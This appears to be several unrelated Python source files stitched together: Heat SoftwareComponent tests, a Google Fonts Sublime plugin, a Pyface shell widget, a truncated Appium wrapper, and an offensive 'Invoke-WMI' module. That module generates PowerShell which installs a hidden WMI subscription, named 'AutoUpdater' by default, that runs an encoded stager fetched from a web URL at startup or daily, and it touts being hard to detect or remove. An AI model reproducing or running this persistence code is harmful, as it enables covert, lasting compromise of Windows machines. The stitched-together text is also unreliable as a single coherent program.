group='component',
name=None,
inputs=props['inputs'],
outputs=props['outputs'],
config={'configs': props['configs']},
options=None)
self.assertEqual(config_id, self.component.resource_id)
def test_handle_delete(self):
self.resource_id = None
self.assertIsNone(self.component.handle_delete())
config_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
self.component.resource_id = config_id
self.rpc_client.delete_software_config.return_value = None
self.assertIsNone(self.component.handle_delete())
self.rpc_client.delete_software_config.side_effect = exc.NotFound
self.assertIsNone(self.component.handle_delete())
def test_resolve_attribute(self):
self.assertIsNone(self.component._resolve_attribute('others'))
self.component.resource_id = None
self.assertIsNone(self.component._resolve_attribute('configs'))
self.component.resource_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
configs = self.template['resources']['mysql_component'
]['properties']['configs']
# configs list is stored in 'config' property of SoftwareConfig
value = {'config': {'configs': configs}}
self.rpc_client.show_software_config.return_value = value
self.assertEqual(configs, self.component._resolve_attribute('configs'))
self.rpc_client.show_software_config.side_effect = exc.NotFound
self.assertIsNone(self.component._resolve_attribute('configs'))
class SoftwareComponentValidationTest(common.HeatTestCase):
scenarios = [
(
'component_full',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: [CREATE]
config: |
#!/bin/bash
echo CREATE $foo
tool: script
inputs:
- name: foo
outputs:
- name: bar
options:
opt1: blah
''',
err=None,
err_msg=None)
),
(
'no_input_output_options',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: [CREATE]
config: |
#!/bin/bash
echo CREATE $foo
tool: script
''',
err=None,
err_msg=None)
),
(
'wrong_property_config',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
config: #!/bin/bash
configs:
- actions: [CREATE]
config: |
#!/bin/bash
echo CREATE $foo
tool: script
''',
err=exc.StackValidationFailed,
err_msg='Unknown Property config')
),
(
'missing_configs',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
inputs:
- name: foo
''',
err=exc.StackValidationFailed,
err_msg='Property configs not assigned')
),
(
'empty_configs',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
''',
err=exc.StackValidationFailed,
err_msg='resources.component.properties.configs: '
'length (0) is out of range (min: 1, max: None)')
),
(
'invalid_configs',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
actions: [CREATE]
config: #!/bin/bash
tool: script
''',
err=exc.StackValidationFailed,
err_msg='is not a list')
),
(
'config_empty_actions',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: []
config: #!/bin/bash
tool: script
''',
err=exc.StackValidationFailed,
err_msg='component.properties.configs[0].actions: '
'length (0) is out of range (min: 1, max: None)')
),
(
'multiple_configs_per_action_single',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: [CREATE]
config: #!/bin/bash
tool: script
- actions: [CREATE]
config: #!/bin/bash
tool: script
''',
err=exc.StackValidationFailed,
err_msg='Defining more than one configuration for the same '
'action in SoftwareComponent "component" is not '
'allowed.')
),
(
'multiple_configs_per_action_overlapping_list',
dict(snippet='''
component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: [CREATE, UPDATE, RESUME]
config: #!/bin/bash
tool: script
- actions: [UPDATE]
config: #!/bin/bash
tool: script
''',
err=exc.StackValidationFailed,
err_msg='Defining more than one configuration for the same '
'action in SoftwareComponent "component" is not '
'allowed.')
),
]
def setUp(self):
super(SoftwareComponentValidationTest, self).setUp()
self.ctx = utils.dummy_context()
tpl = '''
heat_template_version: 2013-05-23
resources:
%s
''' % self.snippet
self.template = template_format.parse(tpl)
self.stack = stack.Stack(
self.ctx, 'software_component_test_stack',
template.Template(self.template))
self.component = self.stack['component']
self.component._rpc_client = mock.MagicMock()
def test_properties_schema(self):
if self.err:
err = self.assertRaises(self.err, self.stack.validate)
if self.err_msg:
self.assertIn(self.err_msg, six.text_type(err))
else:
self.assertIsNone(self.stack.validate())
| |
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@mattifestation', '@harmj0y', '@tristandostaler'],
'Description': ('Persist a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
#'Listener' : {
# 'Description' : 'Listener to use.',
# 'Required' : False,
# 'Value' : ''
#},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : ''
},
'AtStartup' : {
'Description' : 'Switch. Trigger script (within 5 minutes) of system startup.',
'Required' : False,
'Value' : 'True'
},
'SubName' : {
'Description' : 'Name to use for the event subscription.',
'Required' : True,
'Value' : 'AutoUpdater'
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'WebFile' : {
'Description' : 'The location of the launcher.bat file to fetch over the network/web',
'Required' : True,
'Value' : 'http://127.0.0.1/launcher.bat'
}
#'UserAgent' : {
# 'Description' : 'User-agent string to use for the staging request (default, none, or other).',
# 'Required' : False,
# 'Value' : 'default'
#},
#'Proxy' : {
# 'Description' : 'Proxy to use for request (default, none, or other).',
# 'Required' : False,
# 'Value' : 'default'
#},
#'ProxyCreds' : {
# 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
# 'Required' : False,
# 'Value' : 'default'
#}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
#listenerName = self.options['Listener']['Value']
launcher_prefix = self.options['Launcher']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
atStartup = self.options['AtStartup']['Value']
subName = self.options['SubName']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
webFile = self.options['WebFile']['Value']
# staging options
#userAgent = self.options['UserAgent']['Value']
#proxy = self.options['Proxy']['Value']
#proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
if cleanup.lower() == 'true':
# commands to remove the WMI filter and subscription
script = "Get-WmiObject __eventFilter -namespace root\subscription -filter \"name='"+subName+"'\"| Remove-WmiObject;"
script += "Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter \"name='"+subName+"'\" | Remove-WmiObject;"
script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;"
script += "'WMI persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher_fetcher(language='powershell', encode=True, webFile=webFile, launcher=launcher_prefix)
encScript = launcher.split(" ")[-1]
statusMsg += "using launcher_fetcher"
# sanity check to make sure we haven't exceeded the powershell -enc 8190 char max
if len(encScript) > 8190:
print helpers.color("[!] Warning: -enc command exceeds the maximum of 8190 characters.")
return ""
# built the command that will be triggered
triggerCmd = "$($Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -enc " + encScript
if dailyTime != '':
parts = dailyTime.split(":")
if len(parts) < 2:
print helpers.color("[!] Please use HH:mm format for DailyTime")
return ""
hour = parts[0]
minutes = parts[1]
# create the WMI event filter for a system time
script = "$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='"+subName+"';EventNameSpace='root\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = "+hour+" AND TargetInstance.Minute= "+minutes+" GROUP WITHIN 60\"};"
statusMsg += " WMI subscription daily trigger at " + dailyTime + "."
else:
# create the WMI event filter for OnStartup
script = "$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='"+subName+"';EventNameSpace='root\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};"
statusMsg += " with OnStartup WMI subsubscription trigger."
# add in the event consumer to launch the encrypted script contents
script += "$Consumer=Set-WmiInstance -Namespace \"root\\subscription\" -Class 'CommandLineEventConsumer' -Arguments @{ name='"+subName+"';CommandLineTemplate=\""+triggerCmd+"\";RunInteractively='false'};"
# bind the filter and event consumer together
script += "Set-WmiInstance -Namespace \"root\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | Out-Null;"
script += "'WMI persistence established "+statusMsg+"'"
return script
| |
import sublime, sublime_plugin
import threading, urllib, json, re
API_url = 'https://www.googleapis.com/webfonts/v1/webfonts?key='
style_url = 'http://fonts.googleapis.com/css?family='
class merge_fontsCommand(sublime_plugin.TextCommand):
def run(self, edit):
window = sublime.active_window()
self.tags = self.find_tags()
print self.tags # DEBUG
def find_tags(self):
"""
Finds the link tags inside the <head> that reference fonts.googleapis.com
"""
regfull = '<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css\?family=.*/>'
regpart = '(?<=<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css\?family=).*(?=")'
linklist = self.view.find_all(regfull)
linkparts = self.view.find_all(regpart)
startpos = linkparts[0].end()
if len(linklist) <= 1:
return
linklist.reverse()
edit = self.view.begin_edit()
fontlist = []
for f in linkparts:
fontlist.append(self.view.substr(f))
for link in linklist[:-1]:
self.view.erase(edit, link)
addstring = '|' + '|'.join(fontlist[1:])
self.view.insert(edit, startpos, addstring)
self.view.set_status('merge_fonts', 'Merged %s fonts' % (len(linklist)))
self.view.end_edit(edit)
return
def find_fonts(self, tags):
"""
Finds the fonts that are embedded in the <link> tags and their referencing Weights
output format { 'FontFamily':['weight', 'weight']}
"""
pass
def merge(self, fontlist):
"""
Makes a new <link> tag out of the requested fontslist and removes the other -now outdated- <link> tags
"""
pass
class add_effectCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.effects = self.load_effects()
self.makelist(self.effects)
pass
def load_effects(self):
self.effects_filename = 'font-effects.json'
self.effects_file = open(self.effects_filename, 'r')
effects = json.load(self.effects_file)
return effects
def makelist(self, effects):
effectslist = []
for effect in effects:
effectslist.append([effect[0], 'Effect class: ' + effect[1]])
window = sublime.active_window()
window.show_quick_panel(effectslist, self.insert)
pass
def insert(self, picked):
if picked == -1:
return
self.effects[picked]
print picked
class fetch_fontsCommand(sublime_plugin.TextCommand):
def load_settings(self):
self.settings_file = '%s.sublime-settings' % __name__
self.settings = sublime.load_settings(self.settings_file)
pass
def run(self, edit):
self.load_settings()
window = sublime.active_window()
thread = fetchfontsApiCall(self.settings)
thread.start()
self.handle_thread(thread)
def handle_thread(self, thread, i=0, dir=1):
keep_alive = False
if thread.is_alive():
keep_alive = True
if keep_alive:
before = i % 8
after = (7) - before
if not after:
dir = -1
if not before:
dir = 1
i += dir
self.view.set_status('fetchfonts', 'Fetching font list [%s=%s]' % (' ' * before, ' ' * after))
sublime.set_timeout(lambda: self.handle_thread( thread, i, dir), 100)
return
self.fonts = thread.fonts
window = sublime.active_window()
window.show_quick_panel(self.fonts, self.insert)
def insert(self, picked):
if picked == -1:
return
command = self.fonts[picked][2]
match = re.search('ADD F:([\w -]+)&W:([\w, -]+)', command)
font = match.group(1)
font = re.sub('\s', '+', font)
styles = match.group(2)
prefix = '<link rel="stylesheet" type="text/css" href="'
affix = '" />'
line = prefix + style_url + font + ':' + styles + affix
sel = self.view.sel()[0].begin()
edit = self.view.begin_edit()
self.view.insert(edit, sel, line)
self.view.end_edit(edit)
class fetchfontsApiCall(threading.Thread):
"""
Class that functions as a thread. Is called for the fetching of the Webfonts list.
"""
def __init__(self, settings):
# self.window = window
self.settings = settings
self.API_key = self.settings.get('API_key', None)
self.script = self.settings.get('script', 'latin')
threading.Thread.__init__(self)
def run(self):
"""
Called by the main class.
Fetches the fonts from the specified URL with the API key defined in the settings.
"""
if self.API_key == None:
self.view.set_status('fetchfonts', 'Missing Api key in the configuration file:' + __name__ + '.sublime-settings')
return
url = API_url + self.API_key
fontslist = urllib.urlopen(url)
decodedlist = json.load(fontslist)
self.fonts = self.associate(decodedlist)
return
def associate(self, fontslist):
"""
Takes the JSON list fetched from the uri and parses it into an list readable for sublimetext 2.
"""
cnt = len(fontslist['items'])
print 'parsed:' + str(cnt)
fonts_quickpanel_list = []
for item in range(0, cnt):
if self.script in fontslist['items'][item]['subsets']:
family = fontslist['items'][item]['family']
variants = fontslist['items'][item]['variants']
formatlist = []
command = 'ADD F:'
if len(variants) > 1:
option = family + ': All Weights'
formatlist = [option, 'Fetch all available font types of the'+family+' font', command+family+'&W:'+','.join(variants)]
fonts_quickpanel_list.append(formatlist)
for variant in variants:
option = family + ': ' + variant
formatlist = [option, 'The '+family+' font', command+family+'&W:'+variant]
fonts_quickpanel_list.append(formatlist)
cnt = len(fonts_quickpanel_list)
print 'associated:' + str(cnt)
return fonts_quickpanel_list
| |
#------------------------------------------------------------------------------
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Evan Patterson
#------------------------------------------------------------------------------
# Standard library imports.
import __builtin__
from code import compile_command, InteractiveInterpreter
from cStringIO import StringIO
import sys
from time import time
# System package imports.
from pyface.qt import QtCore, QtGui
from pygments.lexers import PythonLexer
# Enthought library imports.
from traits.api import Event, provides
from traits.util.clean_strings import python_name
# Local imports.
from code_editor.pygments_highlighter import PygmentsHighlighter
from console.api import BracketMatcher, CallTipWidget, CompletionLexer, \
HistoryConsoleWidget
from pyface.i_python_shell import IPythonShell, MPythonShell
from pyface.key_pressed_event import KeyPressedEvent
from widget import Widget
#-------------------------------------------------------------------------------
# 'PythonShell' class:
#-------------------------------------------------------------------------------
@provides(IPythonShell)
class PythonShell(MPythonShell, Widget):
""" The toolkit specific implementation of a PythonShell. See the
IPythonShell interface for the API documentation.
"""
#### 'IPythonShell' interface #############################################
command_executed = Event
key_pressed = Event(KeyPressedEvent)
#--------------------------------------------------------------------------
# 'object' interface
#--------------------------------------------------------------------------
# FIXME v3: Either make this API consistent with other Widget sub-classes
# or make it a sub-class of HasTraits.
def __init__(self, parent, **traits):
super(PythonShell, self).__init__(**traits)
# Create the toolkit-specific control that represents the widget.
self.control = self._create_control(parent)
# Set up to be notified whenever a Python statement is executed:
self.control.executed.connect(self._on_command_executed)
# Handle dropped objects.
_DropEventEmitter(self.control).signal.connect(self._on_obj_drop)
#--------------------------------------------------------------------------
# 'IPythonShell' interface
#--------------------------------------------------------------------------
def interpreter(self):
return self.control.interpreter
def execute_command(self, command, hidden=True):
self.control.execute(command, hidden=hidden)
def execute_file(self, path, hidden=True):
self.control.execute_file(path, hidden=hidden)
#--------------------------------------------------------------------------
# 'IWidget' interface.
#--------------------------------------------------------------------------
def _create_control(self, parent):
return PyfacePythonWidget(self, parent)
#--------------------------------------------------------------------------
# 'Private' interface.
#--------------------------------------------------------------------------
def _on_obj_drop(self, obj):
""" Handle dropped objects and add to interpreter local namespace. """
# If we can't create a valid Python identifier for the name of an
# object we use this instead.
name = 'dragged'
if hasattr(obj, 'name') \
and isinstance(obj.name, basestring) and len(obj.name) > 0:
py_name = python_name(obj.name)
# Make sure that the name is actually a valid Python identifier.
try:
if eval(py_name, {py_name : True}):
name = py_name
except Exception:
pass
self.control.interpreter.locals[name] = obj
self.control.execute(name)
self.control._control.setFocus()
#-------------------------------------------------------------------------------
# 'PythonWidget' class:
#-------------------------------------------------------------------------------
class PythonWidget(HistoryConsoleWidget):
""" A basic in-process Python interpreter.
"""
# Emitted when a command has been executed in the interpeter.
executed = QtCore.Signal()
#--------------------------------------------------------------------------
# 'object' interface
#--------------------------------------------------------------------------
def __init__(self, parent=None):
super(PythonWidget, self).__init__(parent)
# PythonWidget attributes.
self.locals = dict(__name__='__console__', __doc__=None)
self.interpreter = InteractiveInterpreter(self.locals)
# PythonWidget protected attributes.
self._buffer = StringIO()
self._bracket_matcher = BracketMatcher(self._control)
self._call_tip_widget = CallTipWidget(self._control)
self._completion_lexer = CompletionLexer(PythonLexer())
self._hidden = False
self._highlighter = PythonWidgetHighlighter(self)
self._last_refresh_time = 0
# file-like object attributes.
self.encoding = sys.stdin.encoding
# Configure the ConsoleWidget.
self.tab_width = 4
self._set_continuation_prompt('... ')
# Configure the CallTipWidget.
self._call_tip_widget.setFont(self.font)
self.font_changed.connect(self._call_tip_widget.setFont)
# Connect signal handlers.
document = self._control.document()
document.contentsChange.connect(self._document_contents_change)
# Display the banner and initial prompt.
self.reset()
#--------------------------------------------------------------------------
# file-like object interface
#--------------------------------------------------------------------------
def flush(self):
""" Flush the buffer by writing its contents to the screen.
"""
self._buffer.seek(0)
text = self._buffer.getvalue()
self._buffer.close()
self._buffer = StringIO()
self._append_plain_text(text)
self._control.moveCursor(QtGui.QTextCursor.End)
def readline(self, prompt=None):
""" Read and return one line of input from the user.
"""
return self._readline(prompt)
def write(self, text, refresh=True):
""" Write text to the buffer, possibly flushing it if 'refresh' is set.
"""
if not self._hidden:
self._buffer.write(text)
if refresh:
current_time = time()
if current_time - self._last_refresh_time > 0.05:
self.flush()
self._last_refresh_time = current_time
def writelines(self, lines, refresh=True):
""" Write a list of lines to the buffer.
"""
for line in lines:
self.write(line, refresh=refresh)
#---------------------------------------------------------------------------
# 'ConsoleWidget' abstract interface
#---------------------------------------------------------------------------
def _is_complete(self, source, interactive):
""" Returns whether 'source' can be completely processed and a new
prompt created. When triggered by an Enter/Return key press,
'interactive' is True; otherwise, it is False.
"""
if interactive:
lines = source.splitlines()
if len(lines) == 1:
try:
return compile_command(source) is not None
except:
# We'll let the interpeter handle the error.
return True
else:
return lines[-1].strip() == ''
else:
return True
def _execute(self, source, hidden):
""" Execute 'source'. If 'hidden', do not show any output.
See parent class :meth:`execute` docstring for full details.
"""
# Save the current std* and point them here
old_stdin = sys.stdin
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdin = sys.stdout = sys.stderr = self
# Run the source code in the interpeter
self._hidden = hidden
try:
more = self.interpreter.runsource(source)
finally:
self._hidden = False
# Restore std* unless the executed changed them
if sys.stdin is self:
sys.stdin = old_stdin
if sys.stdout is self:
sys.stdout = old_stdout
if sys.stderr is self:
sys.stderr = old_stderr
self.executed.emit()
self._show_interpreter_prompt()
def _prompt_started_hook(self):
""" Called immediately after a new prompt is displayed.
"""
if not self._reading:
self._highlighter.highlighting_on = True
def _prompt_finished_hook(self):
""" Called immediately after a prompt is finished, i.e. when some input
will be processed and a new prompt displayed.
"""
if not self._reading:
self._highlighter.highlighting_on = False
def _tab_pressed(self):
""" Called when the tab key is pressed. Returns whether to continue
processing the event.
"""
# Perform tab completion if:
# 1) The cursor is in the input buffer.
# 2) There is a non-whitespace character before the cursor.
text = self._get_input_buffer_cursor_line()
if text is None:
return False
complete = bool(text[:self._get_input_buffer_cursor_column()].strip())
if complete:
self._complete()
return not complete
#---------------------------------------------------------------------------
# 'ConsoleWidget' protected interface
#---------------------------------------------------------------------------
def _event_filter_console_keypress(self, event):
""" Reimplemented for smart backspace.
"""
if event.key() == QtCore.Qt.Key_Backspace and \
not event.modifiers() & QtCore.Qt.AltModifier:
# Smart backspace: remove four characters in one backspace if:
# 1) everything left of the cursor is whitespace
# 2) the four characters immediately left of the cursor are spaces
col = self._get_input_buffer_cursor_column()
cursor = self._control.textCursor()
if col > 3 and not cursor.hasSelection():
text = self._get_input_buffer_cursor_line()[:col]
if text.endswith(' ') and not text.strip():
cursor.movePosition(QtGui.QTextCursor.Left,
QtGui.QTextCursor.KeepAnchor, 4)
cursor.removeSelectedText()
return True
return super(PythonWidget, self)._event_filter_console_keypress(event)
def _insert_continuation_prompt(self, cursor):
""" Reimplemented for auto-indentation.
"""
super(PythonWidget, self)._insert_continuation_prompt(cursor)
source = self.input_buffer
space = 0
for c in source.splitlines()[-1]:
if c == '\t':
space += 4
elif c == ' ':
space += 1
else:
break
if source.rstrip().endswith(':'):
space += 4
cursor.insertText(' ' * space)
#---------------------------------------------------------------------------
# 'PythonWidget' public interface
#---------------------------------------------------------------------------
def execute_file(self, path, hidden=False):
""" Attempts to execute file with 'path'. If 'hidden', no output is
shown.
"""
self.execute('execfile("%s")' % path, hidden=hidden)
def reset(self):
""" Resets the widget to its initial state. Similar to ``clear``, but
also re-writes the banner.
"""
self._reading = False
self._highlighter.highlighting_on = False
self._control.clear()
self._append_plain_text(self._get_banner())
self._show_interpreter_prompt()
#---------------------------------------------------------------------------
# 'PythonWidget' protected interface
#---------------------------------------------------------------------------
def _call_tip(self):
""" Shows a call tip, if appropriate, at the current cursor location.
"""
# Decide if it makes sense to show a call tip
cursor = self._get_cursor()
cursor.movePosition(QtGui.QTextCursor.Left)
if cursor.document().characterAt(cursor.position()) != '(':
return False
context = self._get_context(cursor)
if not context:
return False
# Look up the context and show a tip for it
symbol, leftover = self._get_symbol_from_context(context)
doc = getattr(symbol, '__doc__', None)
if doc is not None and not leftover:
self._call_tip_widget.show_call_info(doc=doc)
return True
return False
def _complete(self):
""" Performs completion at the current cursor location.
"""
context = self._get_context()
if context:
symbol, leftover = self._get_symbol_from_context(context)
if len(leftover) == 1:
leftover = leftover[0]
if symbol is None:
names = self.interpreter.locals.keys()
names += __builtin__.__dict__.keys()
else:
names = dir(symbol)
completions = [ n for n in names if n.startswith(leftover) ]
if completions:
cursor = self._get_cursor()
cursor.movePosition(QtGui.QTextCursor.Left,
n=len(context[-1]))
self._complete_with_items(cursor, completions)
def _get_banner(self):
""" Gets a banner to display at the beginning of a session.
"""
banner = 'Python %s on %s\nType "help", "copyright", "credits" or ' \
'"license" for more information.'
return banner % (sys.version, sys.platform)
def _get_context(self, cursor=None):
""" Gets the context for the specified cursor (or the current cursor
if none is specified).
"""
if cursor is None:
cursor = self._get_cursor()
cursor.movePosition(QtGui.QTextCursor.StartOfBlock,
QtGui.QTextCursor.KeepAnchor)
text = cursor.selection().toPlainText()
return self._completion_lexer.get_context(text)
def _get_symbol_from_context(self, context):
""" Find a python object in the interpeter namespace from a context (a
list of names).
"""
context = map(str, context)
if len(context) == 0:
return None, context
base_symbol_string = context[0]
symbol = self.interpreter.locals.get(base_symbol_string, None)
if symbol is None:
symbol = __builtin__.__dict__.get(base_symbol_string, None)
if symbol is None:
return None, context
context = context[1:]
for i, name in enumerate(context):
new_symbol = getattr(symbol, name, None)
if new_symbol is None:
return symbol, context[i:]
else:
symbol = new_symbol
return symbol, []
def _show_interpreter_prompt(self):
""" Shows a prompt for the interpreter.
"""
self.flush()
self._show_prompt('>>> ')
#------ Signal handlers ----------------------------------------------------
def _document_contents_change(self, position, removed, added):
""" Called whenever the document's content changes. Display a call tip
if appropriate.
"""
# Calculate where the cursor should be *after* the change:
position += added
document = self._control.document()
if position == self._get_cursor().position():
self._call_tip()
#-------------------------------------------------------------------------------
# 'PythonWidgetHighlighter' class:
#-------------------------------------------------------------------------------
class PythonWidgetHighlighter(PygmentsHighlighter):
""" A PygmentsHighlighter that can be turned on and off and that ignores
prompts.
"""
def __init__(self, python_widget):
super(PythonWidgetHighlighter, self).__init__(
python_widget._control.document())
self._current_offset = 0
self._python_widget = python_widget
self.highlighting_on = False
def highlightBlock(self, string):
""" Highlight a block of text. Reimplemented to highlight selectively.
"""
if not self.highlighting_on:
return
# The input to this function is a unicode string that may contain
# paragraph break characters, non-breaking spaces, etc. Here we acquire
# the string as plain text so we can compare it.
current_block = self.currentBlock()
string = self._python_widget._get_block_plain_text(current_block)
# Decide whether to check for the regular or continuation prompt.
if current_block.contains(self._python_widget._prompt_pos):
prompt = self._python_widget._prompt
else:
prompt = self._python_widget._continuation_prompt
# Don't highlight the part of the string that contains the prompt.
if string.startswith(prompt):
self._current_offset = len(prompt)
string = string[len(prompt):]
else:
self._current_offset = 0
super(PythonWidgetHighlighter, self).highlightBlock(string)
def rehighlightBlock(self, block):
""" Reimplemented to temporarily enable highlighting if disabled.
"""
old = self.highlighting_on
self.highlighting_on = True
super(PythonWidgetHighlighter, self).rehighlightBlock(block)
self.highlighting_on = old
def setFormat(self, start, count, format):
""" Reimplemented to highlight selectively.
"""
start += self._current_offset
super(PythonWidgetHighlighter, self).setFormat(start, count, format)
#-------------------------------------------------------------------------------
# 'PyfacePythonWidget' class:
#-------------------------------------------------------------------------------
class PyfacePythonWidget(PythonWidget):
""" A PythonWidget customized to support the IPythonShell interface.
"""
#--------------------------------------------------------------------------
# 'object' interface
#--------------------------------------------------------------------------
def __init__(self, pyface_widget, *args, **kw):
""" Reimplemented to store a reference to the Pyface widget which
contains this control.
"""
self._pyface_widget = pyface_widget
super(PyfacePythonWidget, self).__init__(*args, **kw)
#---------------------------------------------------------------------------
# 'QWidget' interface
#---------------------------------------------------------------------------
def keyPressEvent(self, event):
""" Reimplemented to generate Pyface key press events.
"""
# Pyface doesn't seem to be Unicode aware. Only keep the key code if it
# corresponds to a single Latin1 character.
kstr = event.text()
try:
kcode = ord(str(kstr))
except:
kcode = 0
mods = event.modifiers()
self._pyface_widget.key_pressed = KeyPressedEvent(
alt_down = ((mods & QtCore.Qt.AltModifier) ==
QtCore.Qt.AltModifier),
control_down = ((mods & QtCore.Qt.ControlModifier) ==
QtCore.Qt.ControlModifier),
shift_down = ((mods & QtCore.Qt.ShiftModifier) ==
QtCore.Qt.ShiftModifier),
key_code = kcode,
event = event)
super(PyfacePythonWidget, self).keyPressEvent(event)
#-------------------------------------------------------------------------------
# '_DropEventFilter' class:
#-------------------------------------------------------------------------------
class _DropEventEmitter(QtCore.QObject):
""" Handle object drops on widget. """
signal = QtCore.Signal(object)
def __init__(self, widget):
QtCore.QObject.__init__(self, widget)
self.widget = widget
widget.setAcceptDrops(True)
widget.installEventFilter(self)
def eventFilter(self, source, event):
""" Handle drop events on widget. """
typ = event.type()
if typ == QtCore.QEvent.DragEnter:
if hasattr(event.mimeData(), 'instance'):
# It is pymimedata and has instance data
obj = event.mimeData().instance()
if obj is not None:
event.accept()
return True
elif typ == QtCore.QEvent.Drop:
if hasattr(event.mimeData(), 'instance'):
# It is pymimedata and has instance data
obj = event.mimeData().instance()
if obj is not None:
self.signal.emit(obj)
event.accept()
return True
return QtCore.QObject.eventFilter(self, source, event)
| |
# Copyright 2012 Appium Committers
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ConfigParser
import fcntl
import glob
import os
from os.path import exists
from shutil import copy
from subprocess import call, check_output, Popen, PIPE
from tempfile import mkdtemp
from time import time, sleep
class Appium:
def __init__(self, app='', udid=None, verbose=False):
self.app = app
self.device_udid = udid
self.verbose = verbose
self.instruments_process = None
self.command_index = -1
def start(self):
## Do not start again if Instruments is already running
if self.is_running():
return True
self.command_index = -1
self.create_temp_dir()
self.copy_files()
self.modify_bootstrap_script()
self.launch_instruments()
if self.using_simulator():
self.wait_for_simulator()
self.wait_for_app()
# Check if Instruments is running
def is_running(self):
return self.instruments_process is not None and self.instruments_process.poll() is None
# Check if running on the simulator or on device
def using_simulator(self):
return self.device_udid is None
# Create temp dir
def create_temp_dir(self):
self.temp_dir = mkdtemp('', 'appium-')
if self.verbose:
print "temp_dir:", self.temp_dir
# Copy files
def copy_files(self):
self.base_path = os.path.split(os.path.realpath(__file__))[0]
source = os.path.join(self.base_path, 'template', '*.*')
for filename in glob.glob(source):
copy(filename, self.temp_dir)
# Modify bootstrap script
def modify_bootstrap_script(self):
self.bootstrap = os.path.join(self.temp_dir,'bootstrap.js')
with open(self.bootstrap,'r') as file:
contents = file.read()
new_contents = contents.replace("$PATH_ROOT", self.temp_dir + '/')
with open(self.bootstrap,'w') as file:
file.write(new_contents)
# Launch Instruments app
def launch_instruments(self):
command = ['/usr/bin/instruments', '-t',
os.path.join(self.temp_dir,'Automation.tracetemplate')]
# Specify the UDID if running on device
if not self.using_simulator():
command.extend(['-w', self.device_udid])
# Add the app and app arguments
command.extend([self.app,
'-e', 'UIASCRIPT', self.bootstrap,
'-e', 'UIARESULTSPATH', self.temp_dir])
